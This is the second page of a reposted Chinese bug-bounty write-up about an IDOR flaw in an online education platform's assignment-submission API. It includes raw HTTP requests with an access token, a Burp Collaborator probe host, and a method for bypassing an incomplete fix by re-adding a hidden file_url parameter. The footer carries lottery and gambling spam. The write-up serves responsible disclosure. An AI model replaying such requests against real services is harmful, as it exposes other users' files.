歡迎來到 黑吧安全網 聚焦網絡安全前沿資訊,精華內容,交流技術心得!

知名在線教育平臺的IDOR漏洞

來源:本站整理 作者:佚名 時間:2020-01-28 TAG: 我要投稿
X-Powered-By: PHP/7.1.23
X-Varnish: 762262632
Content-Length: 1465
Connection: Close
X-Iinfo: 14-119388817-119389061 NNNN CT(0 0 0) RT(1557684060144 1031) q(0 0 0 -1) r(55 55) U6
X-CDN: Incapsula
{"data":[REDUCTED"file_url":"https:\/\/files.xyz.org\/user_files\/simulation_27244\/MD MEMO_0.docx","REDUCTED}}
在發現以上漏洞后,我及時提交給了廠商,當漏洞修復完成時,我在復測時,又發現了上面這個作業提交請求中還仍然存在IDOR漏洞。修復后的作業提交請求如下:
PATCH /api/api/v1.0/lesson/30699/assessment_answer/30709 HTTP/1.1
Host: xyz.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Referer: https://xyz.org/
Access-Token: HNg-F0wiTIrxDtc1qDQL2TjHv-ERroxmIowIUkM8Blo
Content-Type: application/json; charset=utf-8
Content-Length: 1206
Cookie: [REDUCTED]
{"completed":true,"answers":[{"field_answer":"xyz.burpcollaborator.net","[Reducted]:"xyz.burpcollaborator.net","field_question_ref":"139"}]}
可見,其中確實沒有了file_url參數。在BurpSuite中的請求
奇怪的是,響應內容中可以看到一個“file_url”:null名值對,所以,我又嘗試在請求中添加進了“file_url”參數值,果然,還是和修復之前一樣可以成功響應!所以最后的經驗是,要學會從請求的響應中觀察那些隱藏的參數。

上一頁  [1] [2] 

【聲明】:黑吧安全網(http://www.650547.live)登載此文出于傳遞更多信息之目的,并不代表本站贊同其觀點和對其真實性負責,僅適于網絡安全技術愛好者學習研究使用,學習中請遵循國家相關法律法規。如有問題請聯系我們,聯系郵箱[email protected],我們會在最短的時間內進行處理。
  • 最新更新
    • 相關閱讀
      • 本類熱門
        • 最近下載
        安徽快3自由的百科 贵州茅台股票 股票配资平台哪个最好 七星彩开奖结果直播 云南彩票快乐10 河内五分彩免费计划 福彩3d走势图1000期走势图 2011中长线股票推荐 微信加股票群 小额理财平台 甘肃十一选五前三遗漏